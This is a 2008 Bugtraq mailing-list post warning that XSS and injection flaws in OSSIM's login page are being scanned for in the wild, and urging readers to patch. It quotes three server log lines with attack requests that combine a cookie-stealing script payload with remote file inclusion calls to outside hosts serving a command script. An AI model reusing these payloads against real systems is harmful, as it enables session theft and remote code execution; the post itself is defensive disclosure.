
Date: 25 Feb 2008 14:46:45 -0000
From: dcid@...ec.net
To: bugtraq@...urityfocus.com
Subject: Re: Re: SQL-injection, XSS in OSSIM (Open Source Security
 Information Management)

Hi list,

I am seeing scans for this in the "wild" now... As Dominique said, I don't know who would open up their SIM to the world, but better apply the patch
soon.

222.239.78.91 - - [22/Feb/2008:17:24:48 -0300] "GET /wiki//ossim/session/login.php?dest=%22%3E%3Cscript%3Ealert(document.cookie)absolute_path=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 200 6792 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]"

195.189.85.162 - - [23/Feb/2008:12:04:55 -0300] "GET /wiki/index.php//ossim/session/login.php?dest=%22%3E%3Cscript%3Ealert(document.cookie)absolute_path=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 200 6605 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]"

61.19.38.155 - - [23/Feb/2008:14:07:28 -0300] "GET //ossim/session/login.php?dest=%22%3E%3Cscript%3Ealert(document.cookie)absolute_path=http://h1.ripway.com/durhaka/cmdasca.txt????? HTTP/1.1" 200 6891 "-" "libwww-perl/5.803"


Thanks,

--
Daniel B. Cid
dcid ( at ) ossec.net
